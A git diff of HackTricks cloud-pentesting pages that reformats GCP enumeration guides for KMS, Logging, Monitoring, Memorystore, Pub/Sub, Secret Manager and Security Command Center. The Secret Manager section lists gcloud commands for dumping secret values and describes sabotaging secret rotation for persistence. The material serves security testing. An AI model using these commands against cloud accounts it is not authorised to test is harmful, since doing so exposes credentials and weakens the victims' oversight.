(HSM)** and can be used for t**esting and development purposes**. Software keys are **not recommended for production** use because they provide low security and are susceptible to attacks. +- **Cloud-hosted keys**: Cloud-hosted keys are **created and managed by KMS** in the cloud using a highly available and reliable infrastructure. These keys are **protected by HSMs**, but the HSMs are **not dedicated to a specific customer**. Cloud-hosted keys are suitable for most production use cases. +- **External keys**: External keys are **created and managed outside of KMS**, and are imported into KMS for use in cryptographic operations. External keys **can be stored in a hardware security module (HSM) or a software library, depending on the customer's preference**. 
### Key Purposes -* **Symmetric encryption/decryption**: Used to **encrypt and decrypt data using a single key for both operations**. Symmetric keys are fast and efficient for encrypting and decrypting large volumes of data. - * **Supported**: [cryptoKeys.encrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/encrypt), [cryptoKeys.decrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/decrypt) -* **Asymmetric Signing**: Used for secure communication between two parties without sharing the key. Asymmetric keys come in a pair, consisting of a **public key and a private key**. The public key is shared with others, while the private key is kept secret. - * **Supported:** [cryptoKeyVersions.asymmetricSign](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/asymmetricSign), [cryptoKeyVersions.getPublicKey](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/getPublicKey) -* **Asymmetric Decryption**: Used to verify the authenticity of a message or data. A digital signature is created using a private key and can be verified using the corresponding public key. - * **Supported:** [cryptoKeyVersions.asymmetricDecrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/asymmetricDecrypt), [cryptoKeyVersions.getPublicKey](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/getPublicKey) -* **MAC Signing**: Used to ensure **data integrity and authenticity by creating a message authentication code (MAC) using a secret key**. HMAC is commonly used for message authentication in network protocols and software applications. 
- * **Supported:** [cryptoKeyVersions.macSign](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/macSign), [cryptoKeyVersions.macVerify](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/macVerify) +- **Symmetric encryption/decryption**: Used to **encrypt and decrypt data using a single key for both operations**. Symmetric keys are fast and efficient for encrypting and decrypting large volumes of data. + - **Supported**: [cryptoKeys.encrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/encrypt), [cryptoKeys.decrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/decrypt) +- **Asymmetric Signing**: Used for secure communication between two parties without sharing the key. Asymmetric keys come in a pair, consisting of a **public key and a private key**. The public key is shared with others, while the private key is kept secret. + - **Supported:** [cryptoKeyVersions.asymmetricSign](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/asymmetricSign), [cryptoKeyVersions.getPublicKey](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/getPublicKey) +- **Asymmetric Decryption**: Used to verify the authenticity of a message or data. A digital signature is created using a private key and can be verified using the corresponding public key. 
+ - **Supported:** [cryptoKeyVersions.asymmetricDecrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/asymmetricDecrypt), [cryptoKeyVersions.getPublicKey](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/getPublicKey) +- **MAC Signing**: Used to ensure **data integrity and authenticity by creating a message authentication code (MAC) using a secret key**. HMAC is commonly used for message authentication in network protocols and software applications. + - **Supported:** [cryptoKeyVersions.macSign](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/macSign), [cryptoKeyVersions.macVerify](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/macVerify) ### Rotation Period & Programmed for destruction period 
@@ -78,31 +65,18 @@ gcloud kms decrypt --ciphertext-file=[INFILE] \ ### Privilege Escalation -{% content-ref url="../gcp-privilege-escalation/gcp-kms-privesc.md" %} -[gcp-kms-privesc.md](../gcp-privilege-escalation/gcp-kms-privesc.md) -{% endcontent-ref %} +{{#ref}} +../gcp-privilege-escalation/gcp-kms-privesc.md +{{#endref}} ### Post Exploitation -{% content-ref url="../gcp-post-exploitation/gcp-kms-post-exploitation.md" %} -[gcp-kms-post-exploitation.md](../gcp-post-exploitation/gcp-kms-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../gcp-post-exploitation/gcp-kms-post-exploitation.md +{{#endref}} ## References -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) +- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md similarity index 58% rename from pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md index 102c59199..efb699e73 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md @@ -1,19 +1,6 @@ # GCP - Logging Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -23,15 +10,15 @@ Cloud Logging is fully integrated with other GCP services, providing a centraliz Key Features: -* **Log Data Centralization:** Aggregate log data from various sources, offering a holistic view of your applications and infrastructure. -* **Real-time Log Management:** Stream logs in real time for immediate analysis and response. -* **Powerful Data Analysis:** Use advanced filtering and search capabilities to sift through large volumes of log data quickly. -* **Integration with BigQuery:** Export logs to BigQuery for detailed analysis and querying. -* **Log-based Metrics:** Create custom metrics from your log data for monitoring and alerting. +- **Log Data Centralization:** Aggregate log data from various sources, offering a holistic view of your applications and infrastructure. +- **Real-time Log Management:** Stream logs in real time for immediate analysis and response. +- **Powerful Data Analysis:** Use advanced filtering and search capabilities to sift through large volumes of log data quickly. +- **Integration with BigQuery:** Export logs to BigQuery for detailed analysis and querying. +- **Log-based Metrics:** Create custom metrics from your log data for monitoring and alerting. ### Logs flow -

https://betterstack.com/community/guides/logging/gcp-logging/

+

https://betterstack.com/community/guides/logging/gcp-logging/

Basically the sinks and log based metrics will device where a log should be stored. 
@@ -40,48 +27,42 @@ Basically the sinks and log based metrics will device where a log should be stor Cloud Logging is highly configurable to suit diverse operational needs: 1. **Log Buckets (Logs storage in the web):** Define buckets in Cloud Logging to manage **log retention**, providing control over how long your log entries are retained. - * By default the buckets `_Default` and `_Required` are created (one is logging what the other isn’t). - * **\_Required** is: + - By default the buckets `_Default` and `_Required` are created (one is logging what the other isn’t). + - **\_Required** is: -{% code overflow="wrap" %} ```` ```bash LOG_ID("cloudaudit.googleapis.com/activity") OR LOG_ID("externalaudit.googleapis.com/activity") OR LOG_ID("cloudaudit.googleapis.com/system_event") OR LOG_ID("externalaudit.googleapis.com/system_event") OR LOG_ID("cloudaudit.googleapis.com/access_transparency") OR LOG_ID("externalaudit.googleapis.com/access_transparency") ``` - -```` -{% endcode %} -* **Retention period** of the data is configured per bucket and must be **at least 1 day.** However the **retention period of \_Required is 400 days** and cannot be modified. -* Note that Log Buckets are **not visible in Cloud Storage.** +```` + +- **Retention period** of the data is configured per bucket and must be **at least 1 day.** However the **retention period of \_Required is 400 days** and cannot be modified. +- Note that Log Buckets are **not visible in Cloud Storage.** 2. **Log Sinks (Log router in the web):** Create sinks to **export log entries** to various destinations such as Pub/Sub, BigQuery, or Cloud Storage based on a **filter**. 
- * By **default** sinks for the buckets `_Default` and `_Required` are created: - * ```bash + - By **default** sinks for the buckets `_Default` and `_Required` are created: + - ```bash _Required logging.googleapis.com/projects//locations/global/buckets/_Required LOG_ID("cloudaudit.googleapis.com/activity") OR LOG_ID("externalaudit.googleapis.com/activity") OR LOG_ID("cloudaudit.googleapis.com/system_event") OR LOG_ID("externalaudit.googleapis.com/system_event") OR LOG_ID("cloudaudit.googleapis.com/access_transparency") OR LOG_ID("externalaudit.googleapis.com/access_transparency") _Default logging.googleapis.com/projects//locations/global/buckets/_Default NOT LOG_ID("cloudaudit.googleapis.com/activity") AND NOT LOG_ID("externalaudit.googleapis.com/activity") AND NOT LOG_ID("cloudaudit.googleapis.com/system_event") AND NOT LOG_ID("externalaudit.googleapis.com/system_event") AND NOT LOG_ID("cloudaudit.googleapis.com/access_transparency") AND NOT LOG_ID("externalaudit.googleapis.com/access_transparency") ``` - * **Exclusion Filters:** It's possible to set up **exclusions to prevent specific log entries** from being ingested, saving costs, and reducing unnecessary noise. + - **Exclusion Filters:** It's possible to set up **exclusions to prevent specific log entries** from being ingested, saving costs, and reducing unnecessary noise. 3. **Log-based Metrics:** Configure **custom metrics** based on the content of logs, allowing for alerting and monitoring based on log data. 4. **Log views:** Log views give advanced and **granular control over who has access** to the logs within your log buckets. - * Cloud Logging **automatically creates the `_AllLogs` view for every bucket**, which shows all logs. Cloud Logging also creates a view for the `_Default` bucket called `_Default`. The `_Default` view for the `_Default` bucket shows all logs except Data Access audit logs. The `_AllLogs` and `_Default` views are not editable. 
+ - Cloud Logging **automatically creates the `_AllLogs` view for every bucket**, which shows all logs. Cloud Logging also creates a view for the `_Default` bucket called `_Default`. The `_Default` view for the `_Default` bucket shows all logs except Data Access audit logs. The `_AllLogs` and `_Default` views are not editable. It's possible to allow a principal **only to use a specific Log view** with an IAM policy like: -{% code overflow="wrap" %} ```json { "bindings": [ { - "members": [ - "user:username@gmail.com" - ], + "members": ["user:username@gmail.com"], "role": "roles/logging.viewAccessor", "condition": { - "title": "Bucket reader condition example", - "description": "Grants logging.viewAccessor role to user username@gmail.com for the VIEW_ID log view.", - "expression": - "resource.name == \"projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_NAME/views/VIEW_ID\"" + "title": "Bucket reader condition example", + "description": "Grants logging.viewAccessor role to user username@gmail.com for the VIEW_ID log view.", + "expression": "resource.name == \"projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_NAME/views/VIEW_ID\"" } } ], @@ -89,7 +70,6 @@ It's possible to allow a principal **only to use a specific Log view** with an I "version": 3 } ``` -{% endcode %} ### Default Logs @@ -103,11 +83,11 @@ However, note that this means that by default **`GetIamPolicy`** actions and oth To enable more logs in the console the sysadmin needs to go to [https://console.cloud.google.com/iam-admin/audit](https://console.cloud.google.com/iam-admin/audit) and enable them. There are 2 different options: -* **Default Configuration**: It's possible to create a default configuration and log all the Admin Read and/or Data Read and/or Data Write logs and even add exempted principals: +- **Default Configuration**: It's possible to create a default configuration and log all the Admin Read and/or Data Read and/or Data Write logs and even add exempted principals: -
+
-* **Select the services**: Or just **select the services** you would like to generate logs and the type of logs and the excepted principal for that specific service. +- **Select the services**: Or just **select the services** you would like to generate logs and the type of logs and the excepted principal for that specific service. Also note that by default only those logs are being generated because generating more logs will increase the costs. @@ -115,7 +95,6 @@ Also note that by default only those logs are being generated because generating The `gcloud` command-line tool is an integral part of the GCP ecosystem, allowing you to manage your resources and services. Here's how you can use `gcloud` to manage your logging configurations and access logs. -{% code overflow="wrap" %} ```bash # List buckets gcloud logging buckets list 
@@ -140,42 +119,28 @@ gcloud logging views describe --bucket --location global # vi gcloud logging links list --bucket _Default --location global gcloud logging links describe --bucket _Default --location global ``` -{% endcode %} -Example to check the logs of **`cloudresourcemanager`** (the one used to BF permissions): [https://console.cloud.google.com/logs/query;query=protoPayload.serviceName%3D%22cloudresourcemanager.googleapis.com%22;summaryFields=:false:32:beginning;cursorTimestamp=2024-01-20T00:07:14.482809Z;startTime=2024-01-01T11:12:26.062Z;endTime=2024-02-02T17:12:26.062Z?authuser=2\&project=digital-bonfire-410512](https://console.cloud.google.com/logs/query;query=protoPayload.serviceName%3D%22cloudresourcemanager.googleapis.com%22;summaryFields=:false:32:beginning;cursorTimestamp=2024-01-20T00:07:14.482809Z;startTime=2024-01-01T11:12:26.062Z;endTime=2024-02-02T17:12:26.062Z?authuser=2\&project=digital-bonfire-410512) +Example to check the logs of **`cloudresourcemanager`** (the one used to BF permissions): [https://console.cloud.google.com/logs/query;query=protoPayload.serviceName%3D%22cloudresourcemanager.googleapis.com%22;summaryFields=:false:32:beginning;cursorTimestamp=2024-01-20T00:07:14.482809Z;startTime=2024-01-01T11:12:26.062Z;endTime=2024-02-02T17:12:26.062Z?authuser=2\&project=digital-bonfire-410512](https://console.cloud.google.com/logs/query;query=protoPayload.serviceName%3D%22cloudresourcemanager.googleapis.com%22;summaryFields=:false:32:beginning;cursorTimestamp=2024-01-20T00:07:14.482809Z;startTime=2024-01-01T11:12:26.062Z;endTime=2024-02-02T17:12:26.062Z?authuser=2&project=digital-bonfire-410512) There aren't logs of **`testIamPermissions`**: -
+
### Post Exploitation -{% content-ref url="../gcp-post-exploitation/gcp-logging-post-exploitation.md" %} -[gcp-logging-post-exploitation.md](../gcp-post-exploitation/gcp-logging-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../gcp-post-exploitation/gcp-logging-post-exploitation.md +{{#endref}} ### Persistence -{% content-ref url="../gcp-persistence/gcp-logging-persistence.md" %} -[gcp-logging-persistence.md](../gcp-persistence/gcp-logging-persistence.md) -{% endcontent-ref %} +{{#ref}} +../gcp-persistence/gcp-logging-persistence.md +{{#endref}} ## References -* [https://cloud.google.com/logging/docs/logs-views#gcloud](https://cloud.google.com/logging/docs/logs-views#gcloud) -* [https://betterstack.com/community/guides/logging/gcp-logging/](https://betterstack.com/community/guides/logging/gcp-logging/) +- [https://cloud.google.com/logging/docs/logs-views#gcloud](https://cloud.google.com/logging/docs/logs-views#gcloud) +- [https://betterstack.com/community/guides/logging/gcp-logging/](https://betterstack.com/community/guides/logging/gcp-logging/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md
new file mode 100644
index 000000000..7af0a0350
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md
@@ -0,0 +1,21 @@
+# GCP - Memorystore Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Memorystore
+
+Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more.
+
+```bash
+# Memcache
+gcloud memcache instances list --region
+gcloud memcache instances describe --region
+# You should try to connect to the memcache instances to access the data
+
+# Redis
+gcloud redis instances list --region
+gcloud redis instances describe --region
+gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md
new file mode 100644
index 000000000..88b10a074
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md
@@ -0,0 +1,57 @@
+# GCP - Monitoring Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Google Cloud Monitoring offers a suite of tools to **monitor**, troubleshoot, and improve the performance of your cloud resources. From a security perspective, Cloud Monitoring provides several features that are crucial for maintaining the security and compliance of your cloud environment:
+
+### Policies
+
+Policies **define conditions under which alerts are triggered and how notifications are sent**. They allow you to monitor specific metrics or logs, set thresholds, and determine where and how to send alerts (like email or SMS).
+
+### Dashboards
+
+Monitoring Dashboards in GCP are customizable interfaces for visualizing the **performance and status of cloud resources**. They offer real-time insights through charts and graphs, aiding in efficient system management and issue resolution.
+
+### Channels
+
+Different **channels** can be configured to **send alerts** through various methods, including **email**, **SMS**, **Slack**, and more.
+
+Moreover, when an alerting policy is created in Cloud Monitoring, it's possible to **specify one or more notification channels**.
+
+### Snoozers
+
+A snoozer will **prevent the indicated alert policies to generate alerts or send notifications** during the indicated snoozing period. Additionally, when a snooze is applied to a **metric-based alerting policy**, Monitoring proceeds to **resolve any open incidents** that are linked to that specific policy.
+ +### Enumeration + +```bash +# Get policies +gcloud alpha monitoring policies list +gcloud alpha monitoring policies describe + +# Get dashboards +gcloud monitoring dashboards list +gcloud monitoring dashboards describe + +# Get snoozers +gcloud monitoring snoozes list +gcloud monitoring snoozes describe + +# Get Channels +gcloud alpha monitoring channels list +gcloud alpha monitoring channels describe +``` + +### Post Exploitation + +{{#ref}} +../gcp-post-exploitation/gcp-monitoring-post-exploitation.md +{{#endref}} + +## References + +- [https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli](https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md similarity index 58% rename from pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md index ffa213ee1..6cd241087 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md @@ -1,19 +1,6 @@ # GCP - Pub/Sub Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Pub/Sub @@ -21,10 +8,10 @@ Learn & practice GCP Hacking: ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md new file mode 100644 index 000000000..a0d1764dc --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md 
@@ -0,0 +1,53 @@
+# GCP - Secrets Manager Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Secret Manager
+
+Google [**Secret Manager**](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, files (max 64KB) and other sensitive data.
+
+A secret can have **different versions storing different data**.
+
+Secrets by **default** are **encrypted using a Google managed key**, but it's **possible to select a key from KMS** to use to encrypt the secret.
+
+Regarding **rotation**, it's possible to configure **messages to be sent to pub-sub every number of days**, the code listening to those messages can **rotate the secret**.
+
+It's possible to configure a day for **automatic deletion**, when the indicated day is **reached**, the **secret will be automatically deleted**.
+
+### Enumeration
+
+```bash
+# First, list the entries
+gcloud secrets list
+gcloud secrets get-iam-policy
+
+# Then, pull the clear-text of any version of any secret
+gcloud secrets versions list
+gcloud secrets versions access 1 --secret=""
+```
+
+### Privilege Escalation
+
+In the following page you can check how to **abuse secretmanager permissions to escalate privileges.**
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-secretmanager-privesc.md
+{{#endref}}
+
+### Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-secret-manager-persistence.md
+{{#endref}}
+
+### Rotation misuse
+
+An attacker could update the secret to **stop rotations** (so it won't be modified), or **make rotations much less often** (so the secret won't be modified) or to **publish the rotation message to a different pub/sub**, or modifying the rotation code being executed (this happens in a different service, probably in a Clound Function, so the attacker will need privileged access over the Cloud Function or any other service)
+
+{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md similarity index 53% rename from pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md index dac57f94c..e38244da5 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md @@ -1,19 +1,6 @@ # GCP - Security Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information 
@@ -23,14 +10,14 @@ Google Cloud Platform (GCP) Security encompasses a **comprehensive suite of tool The Google Cloud Platform (GCP) Security Command Center (SCC) is a **security and risk management tool for GCP** resources that enables organizations to gain visibility into and control over their cloud assets. It helps **detect and respond to threats** by offering comprehensive security analytics, **identifying misconfigurations**, ensuring **compliance** with security standards, and **integrating** with other security tools for automated threat detection and response. -* **Overview**: Panel to **visualize an overview** of all the result of the Security Command Center. -* Threats: \[Premium Required] Panel to visualize all the **detected threats. Check more about Threats below** -* **Vulnerabilities**: Panel to **visualize found misconfigurations in the GCP account**. -* **Compliance**: \[Premium required] This section allows to **test your GCP environment against several compliance checks** (such as PCI-DSS, NIST 800-53, CIS benchmarks...) over the organization. -* **Assets**: This section **shows all the assets being used**, very useful for sysadmins (and maybe attacker) to see what is running in a single page. -* **Findings**: This **aggregates** in a **table findings** of different sections of GCP Security (not only Command Center) to be able to visualize easily findings that matters. -* **Sources**: Shows a **summary of findings** of all the different sections of GCP security **by sectio**n. -* **Posture**: \[Premium Required] Security Posture allows to **define, assess, and monitor the security of the GCP environment**. It works by creating policy that defines constraints or restrictions that controls/monitor the resources in GCP. 
There are several pre-defined posture templates that can be found in [https://cloud.google.com/security-command-center/docs/security-posture-overview?authuser=2#predefined-policy](https://cloud.google.com/security-command-center/docs/security-posture-overview?authuser=2#predefined-policy) +- **Overview**: Panel to **visualize an overview** of all the result of the Security Command Center. +- Threats: \[Premium Required] Panel to visualize all the **detected threats. Check more about Threats below** +- **Vulnerabilities**: Panel to **visualize found misconfigurations in the GCP account**. +- **Compliance**: \[Premium required] This section allows to **test your GCP environment against several compliance checks** (such as PCI-DSS, NIST 800-53, CIS benchmarks...) over the organization. +- **Assets**: This section **shows all the assets being used**, very useful for sysadmins (and maybe attacker) to see what is running in a single page. +- **Findings**: This **aggregates** in a **table findings** of different sections of GCP Security (not only Command Center) to be able to visualize easily findings that matters. +- **Sources**: Shows a **summary of findings** of all the different sections of GCP security **by sectio**n. +- **Posture**: \[Premium Required] Security Posture allows to **define, assess, and monitor the security of the GCP environment**. It works by creating policy that defines constraints or restrictions that controls/monitor the resources in GCP. There are several pre-defined posture templates that can be found in [https://cloud.google.com/security-command-center/docs/security-posture-overview?authuser=2#predefined-policy](https://cloud.google.com/security-command-center/docs/security-posture-overview?authuser=2#predefined-policy) ### **Threats** 
@@ -38,16 +25,15 @@ From the perspective of an attacker, this is probably the **most interesting fea There are 3 types of threat detection mechanisms: -* **Event Threats**: Findings produced by matching events from **Cloud Logging** based on **rules created** internally by Google. It can also scan **Google Workspace logs**. - * It's possible to find the description of all the [**detection rules in the docs**](https://cloud.google.com/security-command-center/docs/concepts-event-threat-detection-overview?authuser=2#how_works) -* **Container Threats**: Findings produced after analyzing low-level behavior of the kernel of containers. -* **Custom Threats**: Rules created by the company. +- **Event Threats**: Findings produced by matching events from **Cloud Logging** based on **rules created** internally by Google. It can also scan **Google Workspace logs**. + - It's possible to find the description of all the [**detection rules in the docs**](https://cloud.google.com/security-command-center/docs/concepts-event-threat-detection-overview?authuser=2#how_works) +- **Container Threats**: Findings produced after analyzing low-level behavior of the kernel of containers. +- **Custom Threats**: Rules created by the company. -It's possible to find recommended responses to detected threats of both types in [https://cloud.google.com/security-command-center/docs/how-to-investigate-threats?authuser=2#event\_response](https://cloud.google.com/security-command-center/docs/how-to-investigate-threats?authuser=2#event_response) +It's possible to find recommended responses to detected threats of both types in [https://cloud.google.com/security-command-center/docs/how-to-investigate-threats?authuser=2#event_response](https://cloud.google.com/security-command-center/docs/how-to-investigate-threats?authuser=2#event_response) ### Enumeration -{% code overflow="wrap" %} ```bash # Get a source gcloud scc sources describe --source=5678 
